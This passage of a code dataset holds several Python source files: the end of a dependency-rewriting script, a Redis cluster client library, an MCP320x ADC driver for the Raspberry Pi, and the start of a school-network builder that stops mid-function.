args.deptypes:\n if deptype not in canbedeps:\n continue\n\n pkgs = format_deplist(pkgs, deptype)\n\n print(pkgs)\n\n if args.replace:\n with open(filepath, 'r') as file_in:\n 
mod = file_in.read()\n\n regex = deptype + '=\\\"(.*\\\\n){0,}?.*\\\"'\n mod = sub(r'^%s' % regex, pkgs, str(mod),\n flags=MULTILINE)\n\n with open(filepath, 'w') as file_out:\n file_out.write(mod)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shizonic/xtools-devel","sub_path":"replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38656447154","text":"# -*- coding: UTF-8 -*-\nimport binascii\n\nimport redis\nfrom redis._compat import (\n b, iteritems, iterkeys, itervalues, basestring, bytes)\nfrom redis.client import list_or_args\n\n\nclass StrictRedisCluster:\n \"\"\"\n Implementation of the Redis Cluster Client using redis.StrictRedis\n\n This abstract class provides a Python interface to all Redis commands on the cluster of redis servers.\n and implementing how the commands are sent to and received from the cluster.\n\n \"\"\"\n\n _read_keys = {\n 'debug': 'debug', 'getbit': 'getbit',\n 'get': 'get', 'getrange': 'getrange', 'hget': 'hget',\n 'hgetall': 'hgetall', 'hkeys': 'hkeys', 'hlen': 'hlen', 'hmget': 'hmget',\n 'hvals': 'hvals', 'lindex': 'lindex', 'llen': 'llen',\n 'lrange': 'lrange', 'object': 'object',\n 'scard': 'scard', 'sismember': 'sismember', 'smembers': 'smembers',\n 'srandmember': 'srandmember', 'strlen': 'strlen', 'type': 'type',\n 'zcard': 'zcard', 'zcount': 'zcount', 'zrange': 'zrange', 'zrangebyscore': 'zrangebyscore',\n 'zrank': 'zrank', 'zrevrange': 'zrevrange', 'zrevrangebyscore': 'zrevrangebyscore',\n 'zrevrank': 'zrevrank', 'zscore': 'zscore',\n 'mget': 'mget', 'bitcount': 'bitcount', 'echo': 'echo', 'debug_object': 'debug_object',\n 'substr': 'substr', 'keys': 'keys', 'randomkey': 'randomkey',\n }\n\n _write_keys = {\n 'append': 'append', 'blpop': 'blpop', 'brpop': 'brpop', 'brpoplpush': 'brpoplpush',\n 'decr': 'decr', 'decrby': 'decrby', 'del': 'del', 'exists': 'exists', 'hexists': 'hexists',\n 'expire': 'expire', 'expireat': 'expireat', 'pexpire': 'pexpire', 'pexpireat': 'pexpireat', 'getset': 'getset', 'hdel': 'hdel',\n 'hincrby': 'hincrby', 'hincrbyfloat': 'hincrbyfloat', 'hset': 'hset', 'hsetnx': 'hsetnx', 'hmset': 'hmset',\n 'incr': 'incr', 'incrby': 'incrby', 'incrbyfloat': 'incrbyfloat', 'linsert': 'linsert', 'lpop': 'lpop',\n 'lpush': 'lpush', 'lpushx': 'lpushx', 'lrem': 'lrem', 'lset': 'lset',\n 'ltrim': 'ltrim', 'move': 'move', 'bitop': 'bitop',\n 'persist': 'persist', 'publish': 'publish', 'psubscribe': 'psubscribe', 'punsubscribe': 'punsubscribe',\n 'rpop': 'rpop', 'rpoplpush': 'rpoplpush', 'rpush': 'rpush',\n 'rpushx': 'rpushx', 'sadd': 'sadd', 'sdiff': 'sdiff', 'sdiffstore': 'sdiffstore',\n 'set': 'set', 'setbit': 'setbit', 'setex': 'setex', 'setnx': 'setnx',\n 'setrange': 'setrange', 'sinter': 'sinter', 'sinterstore': 'sinterstore', 'smove': 'smove',\n 'sort': 'sort', 'spop': 'spop', 'srem': 'srem', 'subscribe': 'subscribe',\n 'sunion': 'sunion', 'sunionstore': 'sunionstore', 'unsubscribe': 'unsubscribe', 'unwatch': 'unwatch',\n 'watch': 'watch', 'zadd': 'zadd', 'zincrby': 'zincrby', 'zinterstore': 'zinterstore',\n 'zrem': 'zrem', 'zremrangebyrank': 'zremrangebyrank', 'zremrangebyscore': 'zremrangebyscore', 'zunionstore': 'zunionstore',\n 'mset': 'mset', 'msetnx': 'msetnx', 'rename': 'rename', 'renamenx': 'renamenx',\n 'del': 'del', 'delete': 'delete', 'ttl': 'ttl', 'pttl': 'pttl', 'flushall': 'flushall', 'flushdb': 'flushdb',\n }\n\n _dont_hash = {\n 'auth': 'auth', 'monitor': 'monitor', 'quit': 
'quit',\n 'shutdown': 'shutdown', 'slaveof': 'slaveof', 'slowlog': 'slowlog', 'sync': 'sync',\n 'discard': 'discard', 'exec': 'exec', 'multi': 'multi',\n }\n\n _tag_keys = {\n 'mget': 'mget', 'rename': 'rename', 'renamenx': 'renamenx',\n 'mset': 'mset', 'msetnx': 'msetnx',\n 'brpoplpush': 'brpoplpush', 'rpoplpush': 'rpoplpush',\n 'sdiff': 'sdiff', 'sdiffstore': 'sdiffstore',\n 'sinter': 'sinter', 'sinterstore': 'sinterstore',\n 'sunion': 'sunion', 'sunionstore': 'sunionstore',\n 'smove': 'smove', 'zinterstore': 'zinterstore',\n 'zunionstore': 'zunionstore', 'sort': 'sort'\n }\n\n _loop_keys = {\n 'keys': 'keys', 'dbsize': 'dbsize',\n\n 'save': 'save', 'bgsave': 'bgsave',\n 'bgrewriteaof': 'bgrewriteaof',\n 'dbsize': 'dbsize', 'info': 'info',\n 'lastsave': 'lastsave', 'ping': 'ping',\n 'flushall': 'flushall', 'flushdb': 'flushdb',\n 'sync': 'sync',\n 'config_set': 'config_set', 'config_get': 'config_get',\n 'time': 'time', 'client_list': 'client_list'\n }\n\n _loop_keys_admin = {\n 'save': 'save', 'bgsave': 'bgsave',\n 'bgrewriteaof': 'bgrewriteaof',\n 'info': 'info',\n 'lastsave': 'lastsave', 'ping': 'ping',\n 'flushall': 'flushall', 'flushdb': 'flushdb',\n 'sync': 'sync',\n 'config_set': 'config_set', 'config_get': 'config_get',\n 'time': 'time', 'client_list': 'client_list'\n }\n\n def __init__(self, cluster={}, db=0, mastersonly=False):\n # raise exception when wrong server hash\n if 'nodes' not in cluster:\n raise Exception(\n \"rediscluster: Please set a correct array of redis cluster.\")\n\n self.cluster = cluster\n have_master_of = 'master_of' in self.cluster\n self.no_servers = len(self.cluster['master_of']) if have_master_of else len(self.cluster['nodes'])\n\n self.redises = {}\n redises_cons = {}\n self.cluster['slaves'] = {}\n\n # connect to all servers\n for alias, server in iteritems(self.cluster['nodes']):\n\n if have_master_of and alias not in self.cluster['master_of']:\n continue\n\n server_str = str(server)\n if server_str in redises_cons:\n self.redises[alias] = redises_cons[server_str]['master']\n self.redises[alias +\n '_slave'] = redises_cons[server_str]['slave']\n self.cluster['slaves'][alias +\n '_slave'] = redises_cons[server_str]['slave_node']\n else:\n try:\n # connect to master\n self.__redis = redis.StrictRedis(db=db, **server)\n if not mastersonly and not have_master_of:\n info = self.__redis.info()\n if info['role'] != 'master':\n raise redis.DataError(\n \"rediscluster: server %s is not a master.\" % (server,))\n\n self.redises[alias] = self.__redis\n redises_cons[server_str] = {}\n redises_cons[server_str]['master'] = self.redises[alias]\n\n # connect to slave\n slave_connected = False\n slave = {}\n if not mastersonly:\n if have_master_of:\n slave = self.cluster[\n 'nodes'][self.cluster['master_of'][alias]]\n elif 'connected_slaves' in info and info['connected_slaves'] > 0:\n slave_host, slave_port, slave_online = info[\n 'slave0'].split(',')\n if slave_online == 'online':\n slave = {'host': slave_host, 'port': slave_port}\n\n if slave :\n try:\n redis_slave = redis.StrictRedis(host=slave['host'], port=int(slave['port']), db=db)\n self.redises[alias + '_slave'] = redis_slave\n self.cluster['slaves'][alias + '_slave'] = {\n 'host': slave['host'], 'port': slave['port']}\n redises_cons[server_str][\n 'slave'] = self.redises[alias + '_slave']\n redises_cons[server_str]['slave_node'] = self.cluster['slaves'][alias + '_slave']\n slave_connected = True\n except redis.RedisError as e:\n pass\n # \"RedisCluster cannot connect to: \" + slave_host +':'+ slave_port\n\n 
if not slave_connected:\n self.redises[alias + '_slave'] = self.redises[alias]\n self.cluster['slaves'][alias + '_slave'] = server\n redises_cons[server_str][\n 'slave'] = self.redises[alias + '_slave']\n redises_cons[server_str]['slave_node'] = self.cluster[\n 'slaves'][alias + '_slave']\n\n except redis.RedisError as e:\n raise redis.ConnectionError(\n \"rediscluster cannot connect to: %s %s\" % (server, e))\n\n def __getattr__(self, name, *args, **kwargs):\n \"\"\"\n Magic method to handle all redis commands\n - string name The name of the command called.\n - tuple args of supplied arguments to the command.\n \"\"\"\n def function(*args, **kwargs):\n if name not in StrictRedisCluster._loop_keys:\n # take care of hash tags\n tag_start = None\n key_type = hash_tag = ''\n # since we don't have \"first item\" in dict,\n # this list is needed in order to check hash_tag in mset({\"a{a}\": \"a\", \"b\":\"b\"})\n list_ht = []\n if isinstance(args[0], (basestring, bytes)):\n key_type = 'string'\n list_ht.append(args[0])\n else:\n if isinstance(args[0], list):\n key_type = 'list'\n list_ht.append(args[0][0])\n else:\n key_type = 'dict'\n list_ht = iterkeys(args[0])\n\n # check for hash tags\n for k in list_ht:\n try:\n tag_start = k.index('{')\n hash_tag = k\n break\n except Exception as e:\n tag_start = None\n\n # trigger error msg on tag keys unless we have hash tags e.g. \"bar{zap}\"\n if name in StrictRedisCluster._tag_keys and not tag_start:\n try:\n return getattr(self, '_rc_' + name)(*args, **kwargs)\n except AttributeError:\n raise redis.DataError(\"rediscluster: Command %s Not Supported (each key name has its own node)\" % name)\n\n # get the hash key\n hkey = args[0]\n # take care of hash tags names for forcing multiple keys on the same node,\n # e.g. 
r.set(\"bar{zap}\", \"bar\"), r.mget([\"foo{foo}\",\"bar\"])\n if tag_start is not None:\n L = list(args)\n if key_type != 'string':\n if key_type == 'list':\n hkey = L[0][0][tag_start + 1:-1]\n L[0][0] = L[0][0][0:tag_start]\n else:\n hkey = hash_tag[tag_start + 1:-1]\n L[0][hash_tag[0:tag_start]] = L[0][hash_tag]\n del L[0][hash_tag]\n else:\n hkey = L[0][tag_start + 1:-1]\n L[0] = L[0][0:tag_start]\n\n args = tuple(L)\n\n # get the node number\n node = self._getnodenamefor(hkey)\n if name in StrictRedisCluster._write_keys:\n redisent = self.redises[node]\n elif name in StrictRedisCluster._read_keys:\n redisent = self.redises[node + '_slave']\n else:\n raise redis.DataError(\"rediscluster: Command %s Not Supported (each key name has its own node)\" % name)\n\n # Execute the command on the server\n return getattr(redisent, name)(*args, **kwargs)\n\n else:\n\n # take care of keys that don't need to go through master and slaves redis servers\n if name not in self._loop_keys_admin:\n try:\n return getattr(self, '_rc_' + name)(*args, **kwargs)\n except AttributeError:\n raise redis.DataError(\"rediscluster: Command %s Not Supported (each key name has its own node)\" % name)\n\n result = {}\n for alias, redisent in iteritems(self.redises):\n if (name in StrictRedisCluster._write_keys and alias.find('_slave') >= 0) or (name in StrictRedisCluster._read_keys and alias.find('_slave') == -1):\n res = None\n else:\n res = getattr(redisent, name)(*args, **kwargs)\n\n result[alias] = res\n\n return result\n\n return function\n\n def _getnodenamefor(self, name):\n \"Return the node name where the ``name`` would land to\"\n return 'node_' + str(\n (abs(binascii.crc32(b(name)) & 0xffffffff) % self.no_servers) + 1)\n\n def getnodefor(self, name):\n \"Return the node where the ``name`` would land to\"\n node = self._getnodenamefor(name)\n return {node: self.cluster['nodes'][node]}\n\n def __setitem__(self, name, value):\n \"Set the value at key ``name`` to ``value``\"\n return self.set(name, value)\n\n def __getitem__(self, name):\n \"\"\"\n Return the value at key ``name``, raises a KeyError if the key\n doesn't exist.\n \"\"\"\n value = self.get(name)\n if value:\n return value\n raise KeyError(name)\n\n def __delitem__(self, *names):\n \"Delete one or more keys specified by ``names``\"\n return self.delete(*names)\n\n def object(self, infotype, key):\n \"Return the encoding, idletime, or refcount about the key\"\n redisent = self.redises[self._getnodenamefor(key) + '_slave']\n return getattr(redisent, 'object')(infotype, key)\n\n def _rc_brpoplpush(self, src, dst, timeout=0):\n \"\"\"\n Pop a value off the tail of ``src``, push it on the head of ``dst``\n and then return it.\n\n This command blocks until a value is in ``src`` or until ``timeout``\n seconds elapse, whichever is first. A ``timeout`` value of 0 blocks\n forever.\n Not atomic\n \"\"\"\n rpop = self.brpop(src, timeout)\n if rpop is not None:\n self.lpush(dst, rpop[1])\n return rpop[1]\n return None\n\n def _rc_rpoplpush(self, src, dst):\n \"\"\"\n RPOP a value off of the ``src`` list and LPUSH it\n on to the ``dst`` list. 
Returns the value.\n \"\"\"\n rpop = self.rpop(src)\n if rpop is not None:\n self.lpush(dst, rpop)\n return rpop\n return None\n\n def _rc_sdiff(self, src, *args):\n \"\"\"\n Returns the members of the set resulting from the difference between\n the first set and all the successive sets.\n \"\"\"\n args = list_or_args(src, args)\n src_set = self.smembers(args.pop(0))\n if src_set is not set([]):\n for key in args:\n src_set.difference_update(self.smembers(key))\n return src_set\n\n def _rc_sdiffstore(self, dst, src, *args):\n \"\"\"\n Store the difference of sets ``src``, ``args`` into a new\n set named ``dest``. Returns the number of keys in the new set.\n \"\"\"\n args = list_or_args(src, args)\n result = self.sdiff(*args)\n if result is not set([]):\n return self.sadd(dst, *list(result))\n return 0\n\n def _rc_sinter(self, src, *args):\n \"\"\"\n Returns the members of the set resulting from the difference between\n the first set and all the successive sets.\n \"\"\"\n args = list_or_args(src, args)\n src_set = self.smembers(args.pop(0))\n if src_set is not set([]):\n for key in args:\n src_set.intersection_update(self.smembers(key))\n return src_set\n\n def _rc_sinterstore(self, dst, src, *args):\n \"\"\"\n Store the difference of sets ``src``, ``args`` into a new\n set named ``dest``. Returns the number of keys in the new set.\n \"\"\"\n args = list_or_args(src, args)\n result = self.sinter(*args)\n if result is not set([]):\n return self.sadd(dst, *list(result))\n return 0\n\n def _rc_smove(self, src, dst, value):\n \"\"\"\n Move ``value`` from set ``src`` to set ``dst``\n not atomic\n \"\"\"\n if self.type(src) != b(\"set\"):\n return self.smove(src + \"{\" + src + \"}\", dst, value)\n if self.type(dst) != b(\"set\"):\n return self.smove(dst + \"{\" + dst + \"}\", src, value)\n if self.srem(src, value):\n return 1 if self.sadd(dst, value) else 0\n return 0\n\n def _rc_sunion(self, src, *args):\n \"\"\"\n Returns the members of the set resulting from the union between\n the first set and all the successive sets.\n \"\"\"\n args = list_or_args(src, args)\n src_set = self.smembers(args.pop(0))\n if src_set is not set([]):\n for key in args:\n src_set.update(self.smembers(key))\n return src_set\n\n def _rc_sunionstore(self, dst, src, *args):\n \"\"\"\n Store the union of sets ``src``, ``args`` into a new\n set named ``dest``. 
Returns the number of keys in the new set.\n \"\"\"\n args = list_or_args(src, args)\n result = self.sunion(*args)\n if result is not set([]):\n return self.sadd(dst, *list(result))\n return 0\n\n def _rc_mset(self, mapping):\n \"Sets each key in the ``mapping`` dict to its corresponding value\"\n result = True\n for k, v in iteritems(mapping):\n result = result and self.set(k, v)\n return result\n\n def _rc_msetnx(self, mapping):\n \"\"\"\n Sets each key in the ``mapping`` dict to its corresponding value if\n none of the keys are already set\n \"\"\"\n for k in iterkeys(mapping):\n if self.exists(k):\n return False\n\n return self._rc_mset(mapping)\n\n def _rc_mget(self, keys, *args):\n \"\"\"\n Returns a list of values ordered identically to ``*args``\n \"\"\"\n args = list_or_args(keys, args)\n result = []\n for key in args:\n result.append(self.get(key))\n return result\n\n def _rc_rename(self, src, dst):\n \"\"\"\n Rename key ``src`` to ``dst``\n \"\"\"\n if src == dst:\n return self.rename(src + \"{\" + src + \"}\", src)\n if not self.exists(src):\n return self.rename(src + \"{\" + src + \"}\", src)\n\n self.delete(dst)\n ktype = self.type(src)\n kttl = self.ttl(src)\n\n if ktype == b('none'):\n return False\n\n if ktype == b('string'):\n self.set(dst, self.get(src))\n elif ktype == b('hash'):\n self.hmset(dst, self.hgetall(src))\n elif ktype == b('list'):\n for k in self.lrange(src, 0, -1):\n self.rpush(dst, k)\n elif ktype == b('set'):\n for k in self.smembers(src):\n self.sadd(dst, k)\n elif ktype == b('zset'):\n for k, v in self.zrange(src, 0, -1, withscores=True):\n self.zadd(dst, v, k)\n\n # Handle keys with an expire time set\n kttl = -1 if kttl is None or kttl < 0 else int(kttl)\n if kttl != -1:\n self.expire(dst, kttl)\n\n return self.delete(src)\n\n def _rc_renamenx(self, src, dst):\n \"Rename key ``src`` to ``dst`` if ``dst`` doesn't already exist\"\n if self.exists(dst):\n return False\n\n return self._rc_rename(src, dst)\n\n def _rc_keys(self, pattern='*'):\n \"Returns a list of keys matching ``pattern``\"\n\n result = []\n for alias, redisent in iteritems(self.redises):\n if alias.find('_slave') == -1:\n continue\n\n result.extend(redisent.keys(pattern))\n\n return result\n\n def _rc_dbsize(self):\n \"Returns the number of keys in the current database\"\n\n result = 0\n for alias, redisent in iteritems(self.redises):\n if alias.find('_slave') == -1:\n continue\n\n result += redisent.dbsize()\n\n return result\n","repo_name":"salimane/rediscluster-py","sub_path":"rediscluster/cluster_client.py","file_name":"cluster_client.py","file_ext":"py","file_size_in_byte":20485,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"45"} +{"seq_id":"20540203685","text":"#!/usr/bin/env python\n#\n# MCP320x\n#\n# Author: Maurik Holtrop\n#\n# This module interfaces with the MCP300x or MCP320x family of chips. These\n# are 10-bit and 12-bit ADCs respectively. 
The x number indicates the number\n# of multiplexed analog inputs: 2 (MCP3202), 4 (MCP3204) or 8 (MCP3208)\n# Communications with this chip are over the SPI protocol.\n# See: https://en.wikipedia.org/wiki/Serial_Peripheral_Interface_Bus\n#\n# The version of the code has two SPI interfaces: the builtin hardware\n# SPI interface on the RPI, or a \"bit-banged\" GPIO version.\n#\n# Bit-Bang GPIO:\n# We emulate a SPI port in software using the GPIO lines.\n# This is a bit slower than the hardware interface, but it is far more\n# clear what is going on, plus the RPi has only one SPI device.\n# Connections: RPi GPIO to MCP320x\n# CS_bar_pin = CS/SHDN\n# CLK_pin = CLK\n# MOSI_pin = D_in\n# MISO_pin = D_out\n#\n# Hardware SPI:\n# This uses the builtin hardware on the RPi. You need to enable this with the\n# raspi-config program first. The data rate can be up to 1MHz.\n# Connections: RPi pins to MCP320x\n# CE0 or CE1 = CS/SHDN (chip select) set CS_bar = 0 or 1\n# SCK = CLK set CLK_pin = 1000000 (transfer speed)\n# MOSI = D_in set MOSI_pin = 0\n# MISO = D_out set MISO_pin = 0\n\n# The SPI protocol simulated here is MODE=0, CPHA=0, which has a positive polarity clock,\n# (the clock is 0 at rest, active at 1) and a positive phase (0 to 1 transition) for reading\n# or writing the data. This corresponds to the specifications of the MCP320x chips.\n#\n# From MCP3208 datasheet:\n# Outgoing data : MCU latches data to A/D converter on rising edges of SCLK\n# Incoming data: Data is clocked out of A/D converter on falling edges, so should be read on rising edge.\ntry:\n import RPi.GPIO as GPIO\nexcept ImportError as error:\n pass\ntry:\n import Adafruit_BBIO as GPIO\nexcept ImportError as error:\n pass\n\ntry:\n import spidev\nexcept ImportError as error:\n pass\n\nfrom DevLib.MyValues import MyValues\n\n\nclass MCP320x:\n \"\"\"This is a class that implements an interface to the MCP320x ADC chips.\n Standard is the MCP3208, but it will also work with the MCP3202, MCP3204, MCP3002, MCP3004 and MCP3008.\"\"\"\n\n def __init__(self, cs_bar_pin, clk_pin=1000000, mosi_pin=0, miso_pin=0, chip='MCP3208',\n channel_max=None, bit_length=None, single_ended=True):\n \"\"\"Initialize the code and set the GPIO pins.\n The last argument, ch_max, is 2 for the MCP3202, 4 for the\n MCP3204 or 8 for the MCP3208.\"\"\"\n\n self._CLK = clk_pin\n self._MOSI = mosi_pin\n self._MISO = miso_pin\n self._CS_bar = cs_bar_pin\n\n chip_dictionary = {\n \"MCP3202\": (2, 12),\n \"MCP3204\": (4, 12),\n \"MCP3208\": (8, 12),\n \"MCP3002\": (2, 10),\n \"MCP3004\": (4, 10),\n \"MCP3008\": (8, 10)\n }\n\n if chip in chip_dictionary:\n self._ChannelMax = chip_dictionary[chip][0]\n self._BitLength = chip_dictionary[chip][1]\n elif chip is None and (channel_max is not None) and (bit_length is not None):\n self._ChannelMax = channel_max\n self._BitLength = bit_length\n else:\n print(\"Unknown chip: {} - Please re-initialize.\".format(chip))\n self._ChannelMax = 0\n self._BitLength = 0\n return\n\n self._SingleEnded = single_ended\n self._Vref = 3.3\n self._values = MyValues(self.read_adc, self._ChannelMax)\n self._volts = MyValues(self.read_volts, self._ChannelMax)\n\n # This is used to speed up the SPIDEV communication. 
Send out MSB first.\n # control[0] - bit7-3: upper 5 bits 0, because we can only send 8 bit sequences.\n # - bit2 : Start bit - starts conversion in ADCs\n # - bit1 : Select single_ended=1 or differential=0\n # - bit0 : D2 high bit of channel select.\n # control[1] - bit7 : D1 middle bit of channel select.\n # - bit6 : D0 low bit of channel select.\n # - bit5-0 : Don't care.\n if self._SingleEnded:\n self._control0 = [0b00000110, 0b00000000, 0] # Pre-compute part of the control word.\n else:\n self._control0 = [0b00000100, 0b00000000, 0] # Pre-compute part of the control word.\n\n if self._MOSI > 0: # Bit Bang mode\n assert self._MISO != 0 and self._CLK < 32\n if GPIO.getmode() != 11:\n GPIO.setmode(GPIO.BCM) # Use the BCM numbering scheme\n\n GPIO.setup(self._CLK, GPIO.OUT) # Setup the ports for in and output\n GPIO.setup(self._MOSI, GPIO.OUT)\n GPIO.setup(self._MISO, GPIO.IN)\n GPIO.setup(self._CS_bar, GPIO.OUT)\n\n GPIO.output(self._CLK, 0) # Set the clock low.\n GPIO.output(self._MOSI, 0) # Set the Master Out low\n GPIO.output(self._CS_bar, 1) # Set the CS_bar high\n\n else:\n self._dev = spidev.SpiDev(0, self._CS_bar) # Start a SpiDev device\n self._dev.mode = 0 # Set SPI mode (phase)\n self._dev.max_speed_hz = self._CLK # Set the data rate\n self._dev.bits_per_word = 8 # Number of bit per word. ALWAYS 8\n\n def __del__(self):\n \"\"\" Cleanup the GPIO before being destroyed \"\"\"\n if self._MOSI > 0:\n GPIO.cleanup(self._CS_bar)\n GPIO.cleanup(self._CLK)\n GPIO.cleanup(self._MOSI)\n GPIO.cleanup(self._MISO)\n\n def get_channel_max(self):\n \"\"\"Return the maximum number of channels\"\"\"\n return self._ChannelMax\n\n def get_bit_length(self):\n \"\"\"Return the number of bits that will be read\"\"\"\n return self._BitLength\n\n def get_value_max(self):\n \"\"\"Return the maximum value possible for an ADC read\"\"\"\n return 2 ** self._BitLength - 1\n\n def send_bit(self, bit):\n \"\"\" Send out a single bit, and pulse clock.\"\"\"\n if self._MOSI == 0:\n return\n #\n # The input is read on the rising edge of the clock.\n #\n GPIO.output(self._MOSI, bit) # Set the bit.\n GPIO.output(self._CLK, 1) # Rising edge sends data\n GPIO.output(self._CLK, 0) # Return clock to zero.\n\n def read_bit(self):\n \"\"\" Read a single bit from the ADC and pulse clock.\"\"\"\n if self._MOSI == 0:\n return 0\n #\n # The output is going out on the falling edge of the clock,\n # and is to be read on the rising edge of the clock.\n\n # Clock should be already low, and data should already be set.\n GPIO.output(self._CLK, 1) # Set the clock high. 
Ready to read.\n bit = GPIO.input(self._MISO) # Read the bit.\n GPIO.output(self._CLK, 0) # Return clock low, next bit will be set.\n\n return bit\n\n def read_adc(self, channel):\n \"\"\"This reads the actual ADC value, after connecting the analog multiplexer to\n the desired channel.\n ADC value is returned at a n-bit integer value, with n=10 or 12 depending on the chip.\n The value can be converted to a voltage with:\n volts = data*Vref/(2**n-1)\"\"\"\n if channel < 0 or channel >= self._ChannelMax:\n print(\"Error - chip does not have channel = {}\".format(channel))\n\n if self._MOSI == 0:\n # SPIdev Code\n # This builds up the control word, which selects the channel\n # and sets single/differential more.\n control = [self._control0[0] + ((channel & 0b100) >> 2), self._control0[1]+((channel & 0b011) << 6), 0]\n dat = self._dev.xfer(control)\n value = (dat[1] << 8)+dat[2] # Unpack the two 8-bit words to a single integer.\n return value\n\n else:\n # Bit Bang code.\n # To read out this chip you need to send:\n # 1 - start bit\n # 2 - Single ended (1) or differential (0) mode\n # 3 - Channel select: 1 bit for x=2 or 3 bits for x=4,8\n # 4 - MSB first (1) or LSB first (0)\n #\n # Start of sequence sets CS_bar low, and sends sequence\n #\n GPIO.output(self._CLK, 0) # Make sure clock starts low.\n GPIO.output(self._MOSI, 0)\n GPIO.output(self._CS_bar, 0) # Select the chip.\n self.send_bit(1) # Start bit = 1\n self.send_bit(self._SingleEnded) # Select single or differential\n if self._ChannelMax > 2:\n self.send_bit(int((channel & 0b100) > 0)) # Send high bit of channel = DS2\n self.send_bit(int((channel & 0b010) > 0)) # Send mid bit of channel = DS1\n self.send_bit(int((channel & 0b001) > 0)) # Send low bit of channel = DS0\n else:\n self.send_bit(channel)\n\n self.send_bit(0) # MSB First (for MCP3x02) or don't care.\n\n # The clock is currently low, and the dummy bit = 0 is on the output of the ADC\n #\n self.read_bit() # Read the bit.\n\n data = 0\n for i in range(self._BitLength):\n # Note you need to shift left first, or else you shift the last bit (bit 0)\n # to the 1 position.\n data <<= 1\n bit = self.read_bit()\n data += bit\n\n GPIO.output(self._CS_bar, 1) # Unselect the chip.\n\n return data\n\n def read_volts(self, channel):\n \"\"\"Read the ADC value from channel and convert to volts, assuming that Vref is set correctly. \"\"\"\n return self._Vref * self.read_adc(channel) / self.get_value_max()\n\n def fast_read_adc0(self):\n \"\"\"This reads the actual ADC value of channel 0, with as little overhead as possible.\n Use with SPIDEV ONLY!!!!\n returns: The ADC value as an n-bit integer value, with n=10 or 12 depending on the chip.\"\"\"\n\n dat = self._dev.xfer(self._control0)\n value = (dat[1] << 8) + dat[2]\n return value\n\n @property\n def values(self):\n \"\"\"ADC values presented as a list.\"\"\"\n return self._values\n\n @property\n def volts(self):\n \"\"\"ADC voltages presented as a list\"\"\"\n return self._volts\n\n @property\n def accuracy(self):\n \"\"\"The fractional voltage of the least significant bit. \"\"\"\n return self._Vref / float(self.get_value_max())\n\n @property\n def vref(self):\n \"\"\"Reference voltage used by the chip. You need to set this. It defaults to 3.3V\"\"\"\n return self._Vref\n\n @vref.setter\n def vref(self, vr):\n self._Vref = vr\n\n\ndef main(argv):\n \"\"\"Test code for the MCP320x driver. 
This assumes you are using a MCP3208\n If no arguments are supplied, then use SPIdev for CE0 and read channel 0\"\"\"\n\n if len(argv) < 3:\n print(\"Args : \", argv)\n cs_bar = 0\n clk_pin = 1000000\n mosi_pin = 0\n miso_pin = 0\n if len(argv) < 2:\n channel = 0\n else:\n channel = int(argv[1])\n \n elif len(argv) < 6:\n print(\"Please supply: cs_bar_pin clk_pin mosi_pin miso_pin channel\")\n sys.exit(1)\n\n else:\n cs_bar = int(argv[1])\n clk_pin = int(argv[2])\n mosi_pin = int(argv[3])\n miso_pin = int(argv[4])\n channel = int(argv[5])\n\n adc_chip = MCP320x(cs_bar, clk_pin, mosi_pin, miso_pin)\n try:\n while True:\n value = adc_chip.read_adc(channel)\n print(\"{:4d}\".format(value))\n time.sleep(0.1)\n except KeyboardInterrupt:\n sys.exit(0)\n\n\nif __name__ == '__main__':\n import sys\n import time\n main(sys.argv)\n","repo_name":"mholtrop/Phys605","sub_path":"Python/DevLib/MCP320x.py","file_name":"MCP320x.py","file_ext":"py","file_size_in_byte":11970,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"74367745096","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 09:10:58 2018\n\n@author: LAPT0084\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 3 14:49:57 2018\n\n@author: LAPT0084\n\"\"\"\n\n\nimport networkx as nx \nimport numpy as np \nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\n\nimport create_secpri as cs\nimport data_loader as dl\n\n\nbasepath = os.path.dirname(__file__)\nschools_path = basepath + \"/../data/\"\n\ndef build_school_network(): \n secpri = cs.create_secpri_multi()\n schools_net = make_network(secpri)\n return schools_net\n\n\n\ndef build_network_alinks(data_path = schools_path + r'/actual_links.csv'):\n\n alinks = pd.read_csv(data_path)\n \n data_net = nx.Graph()\n \n \n edges = np.array(alinks[['BRINVEST1', 'BRINVEST2']])\n weights = [float(w) for w in alinks.aantal]\n \n \n for n in set(list(alinks.BRINVEST1) + list(alinks.BRINVEST2)):\n data_net.add_node(n)\n \n for i, edge in enumerate(edges):\n c_ij = min(500., weights[i])\n data_net.add_edge(*edge, weight=c_ij , inv_weight=1./c_ij)\n \n \n return data_net\n\n\n\n\n\ndef make_network(school_frame, HH_dist_frame = 'default'):\n \n schools_net = nx.Graph()\n \n secondary_urns = school_frame.SecondaryURN.unique()\n #secondary_names = secpri['INSTELLINGSNAAM VO'].unique()\n schools_net.add_nodes_from(secondary_urns, typ='Sec')\n \n primary_urns = school_frame.Primary_School_URN.unique()\n #primary_names = school_frame['INSTELLINGSNAAM PO'].unique()\n schools_net.add_nodes_from(primary_urns, typ='Pri')\n \n edges = np.array(school_frame[['SecondaryURN', 'Primary_School_URN']])\n weights = np.array([float(w) for w in school_frame.pupil_count])\n for i, edge in enumerate(edges):\n if isinstance(HH_dist_frame, str):\n c_ij = edge_weight(weight=weights[i], ave_age_diff=3.)\n else:\n c_ij = edge_weight(weight=weights[i], ave_age_diff=3. 
